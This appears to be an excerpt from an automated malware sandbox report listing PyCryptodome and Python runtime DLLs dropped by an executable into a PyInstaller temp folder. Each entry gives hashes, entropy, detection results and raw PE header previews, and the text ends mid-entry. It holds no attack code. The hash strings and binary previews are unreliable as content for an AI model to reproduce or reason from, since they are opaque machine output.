C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA224.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.904187142846202
Encrypted:	false
SSDEEP:	384:CGljwG2JaiaqvYHp5RYcARQOj4MSTjqgPm4DwOArwgjxojS:C0jwLJlZYtswvbDwlr1jUS
MD5:	9F6EA560ABD556E1E372137BEAFD630C
SHA1:	E8FBC6AAEFA6A28957486EE024B45C8548EFEFB4
SHA-256:	282B357A06DC7D903B47A26535DCA2D5561007DF3FD2CFE6A1D984E0E9AF991E
SHA-512:	869716AB2501012D1236BE7CDEDED16A62031A409A8FE630D0F7817C1341321205F5B5A1BBB389FEC4661B6BB061552C464895EFCC7E01403BD0FCCED40557F0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...Ya.c.........." ...".6... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text...h5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..,............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA256.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.906874026734986
Encrypted:	false
SSDEEP:	384:CtljwG2JaQaqvYHp5RYcARQOj4MSTjqgPm4Dw8regjxojS:C/jwLJbZYtswvbDw8r7jUS
MD5:	7A573F50BD6942E9BB68307E5B6A0BFF
SHA1:	7E0E435C8589EC3CECFE6354AE9E5AE868B9B209
SHA-256:	C6CD3F23D027FEBDF48161D3B74EDB6C9D4D1BDE23F775990F49572D8EB9DFB9
SHA-512:	9ECD754B99E020A169366CB8C99816070221C4DB2C1EF8C23B6DAC765E6BB56EA3ABBE969025AECEDE8EB6C3EA8C626562F2CDA3C4EA537C5DB1A841F19C2AD5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...Xa.c.........." ...".6... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text...h5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..,............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA384.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.865358643370569
Encrypted:	false
SSDEEP:	768:CkDLB9k/jjcui0gel9soFdkO66MlPGXmXcu6DbKjL:fk/Au/FZ6nPxM5DejL
MD5:	FC70E2AF29A514CE21DEB91FA2F21B53
SHA1:	6ED627DD441483ACB43085273FB69D787EB21A2E
SHA-256:	BB0A16A2528A32E933EBE0B3A6EF85693D9D2993880675190633B87DD70B219D
SHA-512:	E1217276B9E7D57EEF9854150E27E0D196CEB9125938BBD0376C7AF48303B3E3F98C41E65A398FF06DC413266208CC6707DBEBD2C6415281B2F6771F9914F627
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...Za.c.........." ...".H..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..,............f..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_SHA512.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26624
Entropy (8bit):	5.9214502299059255
Encrypted:	false
SSDEEP:	768:CgYLh9avgjrui0gel9soFdkO66MlPGXmXcXrDnMxj:8avWu/FZ6nPxMbDUj
MD5:	51531F4C138871DA66E26AD05176A7F7
SHA1:	73F239AB5FDA66124440FCDADB25089F7DB53747
SHA-256:	EE0E755EBEB1650DDA116EA9CE1A173DD484070377340D277FE0FFC5A02B1838
SHA-512:	888008DD7CEA947C9B7506B9B4608A0E65D5886658A95FD5895EAEEFDF27E55C957FE750E6EC17E4E39FE2786AA2C4BB99B899CB8C1567AB3BB64C07923853CC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...\a.c.........." ...".H..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..,............f..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_ghash_clmul.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	5.022910258326394
Encrypted:	false
SSDEEP:	192:6RF/1nb2eqCQtkbsAT2fixSrdYDtrymjcqgQvEW:6d2P6bsK4H+DcwgQvEW
MD5:	88E3148D1EB84022E508736D0D488185
SHA1:	4D1D3251CC5E61C7FCF5DC6273E3D7BA301D6CA9
SHA-256:	BA4C1492BB4884F3D77F61A7D23EC9E190EB7DA3A115A271D0954D933264FB71
SHA-512:	25A86C56B84275C2314AD1FD98635B43373977DFC6F2F6737F22B1962A3BB5480539A35DB9FBB70FCA16F5ACB5F19BAB63E1CADA776D1667D07332322F641A5F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&...H...H...H......H..I...H..I...H...I...H..M...H..L...H..K...H...@...H...H...H.......H...J...H.Rich..H.........................PE..d...]a.c.........." ..."............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_ghash_portable.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.021050571118178
Encrypted:	false
SSDEEP:	192:HeF/1nb2eqCQtks0iiNqdF4mtPjD0MA5LPYcqgYvEL2x:02P6fFA/4GjDYcgYvEL2x
MD5:	1A3A27F63AFEB42C0282EADA02AC834A
SHA1:	FADDA44628AEF3EC70CC02FC0E43A88C7832F7BC
SHA-256:	E7A7AB2D31AEE3B99773C814114D60EB71107EF862930C582F99313943249163
SHA-512:	0D6D397F87CC5A8A83F1DF20687C967DF4FAF80CF0807AE2B06969E16C107F18A5D39CE34C32C42A53D1726A50860C180266ECAD81B4235F041920F496B25FC7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+.....o+.....o+..o..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...]a.c.........." ..."............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.....................@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_keccak.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.2611173941646205
Encrypted:	false
SSDEEP:	384:CjP2T9FRjRskTdf4YBU7YP5yUYDn1give:CcHlRl57IC8UYDnG
MD5:	3CFA49A173B55891D855BF6D4FEB56C2
SHA1:	2AC09A5F0082B40B4DD801D436DE0391C76A5E6E
SHA-256:	0FAB7DF1E54416434F670EF97ED474FA11C09AA30BED1A8575A09E26DB6DF63C
SHA-512:	AD4B300C8F561A6068946590D53551C93D99D5A728ED87D142B4186CA65C28FE793D343BC09804AB9AEA2B8FAA263F06073BE4231D610390EFD65472C5E7AAC4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...\a.c.........." ...". ... ......P.....................................................`.........................................`9......T:..d....`.......P..p............p..,....3...............................2..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..p....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Hash\_poly1305.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.1302421684233535
Encrypted:	false
SSDEEP:	192:CHZNGfqDgvUh43G6coX2SSwmPL4V7wTdDll1Y2cqgWjvE:CiFMhuGGF2L4STdDJYWgWjvE
MD5:	ECA16BB6EF78ADF91705ACD412CE4F49
SHA1:	C1FFA8FD2A8898CCF4C923B54C015314DC76B333
SHA-256:	3A22C6E97AD47A8FA33E9B28455CE3E6D72008A9A1800F6489FF5AF752C37F18
SHA-512:	DAC721445E07944266BBFA4E6AE4CB5018FD2E042455D5FA545FA93CB009F3E539BB88FC2FA4CEB758C2AABCA67FCCD2043368F0D9B5B83EBEF35346F9EB7562
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%Y.oK..oK..oK......oK...J..oK...J..oK..oJ..oK...N..oK...O..oK...H..oK...C..oK...K..oK......oK...I..oK.Rich.oK.........................PE..d...^a.c.........." ..."..... ......P.....................................................`......................................... 9.......9..d....`.......P..\|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..\|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Math\_modexp.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35840
Entropy (8bit):	5.847604537982625
Encrypted:	false
SSDEEP:	768:dxSlYMeNklGS7W5AvQEzRI7V4pMgn0i9yoZrjrq1GS:HSlWNs57uAvQEzR04pMg0WpZrjrq
MD5:	BEEC00F147B53EF8033EB5DF8821AEF0
SHA1:	FF0F5F7C8F168986580C9FFE3B256C966BB0C820
SHA-256:	404EDF6130C709A88B7387F51B6D746BED96230E6C0E670641AFCA799279B504
SHA-512:	678C1E64A7632D8B2628C30578DA227FAFC4D8AE14E020C183FA4AD3B99E2AD45DD695341E7B3196B6E199E68FA5EDABB651757DF34C395A63DB548D770DA649
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..\|.../.../.../..Q/.../G....../C....../.../#../G....../G....../G....../....../....../.=/.../....../Rich.../................PE..d...la.c.........." ...".\...2......0.....................................................`..........................................~..d...T...d...............$...............,....s...............................q..@............p..(............................text...XZ.......\.................. ..`.rdata.......p.......`..............@..@.data................t..............@....pdata..$...........................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Protocol\_scrypt.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.798545931891201
Encrypted:	false
SSDEEP:	192:lCkCffqPSTMeAk4OeR64ADp6i6RcqgO5vE:lAZMcPeR64ADT63gO5vE
MD5:	DD7D22A0AFE540C07CE9D919CD779203
SHA1:	0E76DB96EC2D9922937A77ABEDB7E61037CC8CB9
SHA-256:	880A4418D81C4DA0D588C0CFD7C68D8C5476385D9203A2D6DED25A0F7B330A76
SHA-512:	BD720CF67E264040F8076EDBB72843305094F1D87BD03A1E9FBEB47564F3963120D76BAD6887FEA560B45958F2FFA929A7D63EA1EC9B633DA23784D98A68C32A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................;..................................................................W.............Rich............................PE..d...ca.c.........." ..."............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ec_ws.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	754688
Entropy (8bit):	7.627131782370933
Encrypted:	false
SSDEEP:	12288:wwEuHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6hz:xEuHoxJFf1p34hcrn5Go9yQO6x
MD5:	62A32904910D5550F21C4C4D08993ABE
SHA1:	834FB3919E49439353B62A8B7456E6E5E879EFE0
SHA-256:	3EE17F4004B4EA1DB4D85DB545223AADD6FDD635DF6120A354F6DC605F848B76
SHA-512:	7D45AD10623F297485789DB5BFC153FC8DBC5DB0F1E60D2B244B8B02DACE9A5DD9F947C6EBD7E67739DDCB25569F056FBB131AFB55E817EA6F29112C122FBA1B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$..L$..L$..L-.#L"..Lk.M&..Lo.M'..L$..L...Lk.M(..Lk.M,..Lk.M'..L..M!..L..M%..L..OL%..L..M%..LRich$..L................PE..d...ha.c.........." ...".n..........0.....................................................`.........................................pp..d....q..d...............l...............4...@Z...............................Y..@...............(............................text...hm.......n.................. ..`.rdata..d............r..............@..@.data................j..............@....pdata..l............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed25519.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27648
Entropy (8bit):	5.7998007997145695
Encrypted:	false
SSDEEP:	384:vRwib1zOF2cZT1n0/kyTMIl9bhgIW0mvNah4rzWrxmlPft/wxD6sQsgkbQ0e1J:JLpI2czeM+9dmvNah4uktIxDIkf
MD5:	9E8C8445A0AFCE8FB90F09393D8632A7
SHA1:	F71D027B4064C60BCD6A997E770FBA9F157C907C
SHA-256:	401915CD7832F79187DBE9C1837EF3D2F1C5F274552500A7610453537C3865F5
SHA-512:	E8E7836F1FB28964C1F921EF3FFE42CF43614F52E74BB88458673F216340322B591916FA7FB1E36270CA959A9FAA18AA70C42D5F72B1015BEA8F9198C30BD36E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.o...o...o.......o.......o.......o...o...o.......o.......o.......o.......o.......o....t..o.......o..Rich.o..................PE..d...ja.c.........." ...".F...(......P.....................................................`..........................................j..0....k..d...............................,...pc..............................0b..@............`...............................text....D.......F.................. ..`.rdata.."....`.......J..............@..@.data................\..............@....pdata...............d..............@..@.rsrc................h..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_ed448.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.032199417476561
Encrypted:	false
SSDEEP:	1536:eVoBLZD2Ia9nihf5WeimczTvc/XVTF1bLG4/7MAvQZzS36JM+t:eVoBLZD2Ia9nihf5WFbYXVTFRqaMAvQl
MD5:	6E8F6149B570FD60969FB9183BA87CEB
SHA1:	F7EFA3B00072B00847E63061FE16D9722874DC62
SHA-256:	7C212E351BB27B6E88C9FCCA8315405EE6E3098E88FFB31A2706950E537CA52C
SHA-512:	DF74418FF014AC96CC8C78F964536992E18129B19F17D1EBF4BDDA0E30D168F5F6628D28A0DA1A63F89EEFD1A9BF332360317FE2CF50636834AD1124420F05DA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..\|.../.../.../..Q/.../G....../C....../.../#../G....../G....../G....../....../....../.=/.../....../Rich.../................PE..d...ka.c.........." ...".....:......0........................................`............`.............................................h...(...d....@.......0..$............P..,.......................................@............................................text...X........................... ..`.rdata..............................@..@.data...............................@....pdata..$....0......................@..@.rsrc........@......................@..@.reloc..,....P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\PublicKey\_x25519.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.48986296849646
Encrypted:	false
SSDEEP:	96:ypVVdJvbrqTuy/Th/Y0IluLfcC75JiC4cs89EfqADBhDsAbcX6gn/7EC:gVddiTHThQTctdErDDDsicqgn/7
MD5:	F1A2E905085675FC72DE2BA11BF43370
SHA1:	6BA1331FEED29AF133E9FBDA5781CCEC8DC57319
SHA-256:	FAAEA0BFC5EAFA3EBCD625A4F12CCD260D8AF2236D073C86A30C3A1AE38BA141
SHA-512:	1472363871D5C69A5966E32BE8A11C1E3976A5ACC3F5AE51945884514BA4E66FF0C36597152E5A349FB16E66AAC2D4465C1F58EE1322D0712F7AF63875115AFA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6!.bWO.bWO.bWO.k/..`WO.-+N.`WO.)/N.aWO.bWN.FWO.-+J.iWO.-+K.jWO.-+L.aWO.+G.cWO.+O.cWO.+..cWO.+M.cWO.RichbWO.........PE..d...ia.c.........." ..."............P........................................p............`..........................................'..P...0(..P....P.......@...............`..,...P#..............................."..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util\_cpuid_c.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.73280708403616
Encrypted:	false
SSDEEP:	96:kDJVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EVAElIijKDQGGbM6YJWJcX6gbW6s:6VddiTHThQTctEEaEDKDKMRWJcqgbW6
MD5:	A9B7C866C5A18CC96570CCA3BE6A2433
SHA1:	4F78C7516E512529B977048BC87ED3A95383B44E
SHA-256:	72998624C023B21F21E449F3268B7E839B248BA55440087CB6B421ED65F9A1B5
SHA-512:	EC890E84384C7B1804CE73B097EF068BADA15ADB5F76E1E9B2BCC54CDE910165A9729F40A1AC18D196DDD3EE4EE60A0CFAA6D56DAAFCAD10630AD2658FAF485B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6).bWG.bWG.bWG.k/..`WG.-+F.`WG.)/F.aWG.bWF.AWG.-+B.iWG.-+C.jWG.-+D.aWG.+O.cWG.+G.cWG.+..cWG.+E.cWG.RichbWG.........................PE..d...aa.c.........." ..."............P........................................p............`..........................................'..\|....'..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\Crypto\Util\_strxor.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.688658167085762
Encrypted:	false
SSDEEP:	96:k0yZVVdJvbrqTuy/Th/Y0IluLfcC75JiCKs89EMz3DOWMot4BcX6gbW6O:XQVddiTHThQTctEEO3DEoKcqgbW6
MD5:	5738D83E2A66B6ACE4F631A9255F81D9
SHA1:	5B6EBB0B82738781732CF7CFD497F5AEB3453DE2
SHA-256:	F2718ADADB6E9958081DCB5570EF737C66772C166A6AD8C0401ADCD9A70F46A0
SHA-512:	BB21B62FD7FEE22DFA04274D0FA1AEC666C7845CD2EC3F01F1A0418A2C68F228EC0AE451C793CCAE3AA88F1EFEE5D6019138C0975497518F990B8511B2FD0E75
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&6).bWG.bWG.bWG.k/..`WG.-+F.`WG.)/F.aWG.bWF.AWG.-+B.iWG.-+C.jWG.-+D.aWG.+O.cWG.+G.cWG.+..cWG.+E.cWG.RichbWG.........................PE..d...ca.c.........." ..."............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\VCRUNTIME140.dll

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98736
Entropy (8bit):	6.474996871326343
Encrypted:	false
SSDEEP:	1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5:	F12681A472B9DD04A812E16096514974
SHA1:	6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256:	D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512:	7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\_asyncio.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	63864
Entropy (8bit):	6.138931224373156
Encrypted:	false
SSDEEP:	1536:PQ/9uukni8rAr1QxZIbmQhID5ntG7SytPxE:IVuHe5QxZIbmQhID5nYHxE
MD5:	2859C39887921DAD2FF41FEDA44FE174
SHA1:	FAE62FAF96223CE7A3E6F7389A9B14B890C24789
SHA-256:	AEBC378DB08617EA81A0A3A3BC044BCC7E6303E314630392DD51BAB12F879BD9
SHA-512:	790BE0C95C81EB6D410E53FE8018E2CA5EFD1838DC60539EBB011911C36C8478333EE95989CFD1DDAF4F892B537AE8305EB4CD893906930DEAE59C8965CF2FBB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..c...c...c.......c...b...c...f...c...g...c...`...c...b...c.Q.b...c...b...c...n...c...c...c.......c...a...c.Rich..c.........................PE..d...^.Vc.........." ...!.R..........`................................................X....`.............................................P.......d.......................x)..........pw..T...........................0v..@............p...............................text....P.......R.................. ..`.rdata..ZK...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\_bz2.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83328
Entropy (8bit):	6.532254531979707
Encrypted:	false
SSDEEP:	1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
MD5:	4101128E19134A4733028CFAAFC2F3BB
SHA1:	66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
SHA-256:	5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
SHA-512:	4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\_cffi_backend.cp311-win_amd64.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181760
Entropy (8bit):	6.176962076839488
Encrypted:	false
SSDEEP:	3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
MD5:	FDE9A1D6590026A13E81712CD2F23522
SHA1:	CA99A48CAEA0DBACCF4485AFD959581F014277ED
SHA-256:	16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
SHA-512:	A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......._......C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C..B...Cz..B...C...C...C..B...C..HC...C..B...C."C...C..B...CRich...C........................PE..d...m.b.........." .........B..............................................0............`..........................................g..l....g..................<............ .......M...............................M..8............................................text...x........................... ..`.rdata..............................@..@.data....\.......0...x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI60602\_ctypes.pyd

Process:	C:\Users\user\Desktop\322pVOVprx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	123768
Entropy (8bit):	6.017133084000375
Encrypted:	false
SSDEEP:	3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
MD5:	6A9CA97C039D9BBB7ABF40B53C851198
SHA1:	01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
SHA-256:	E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
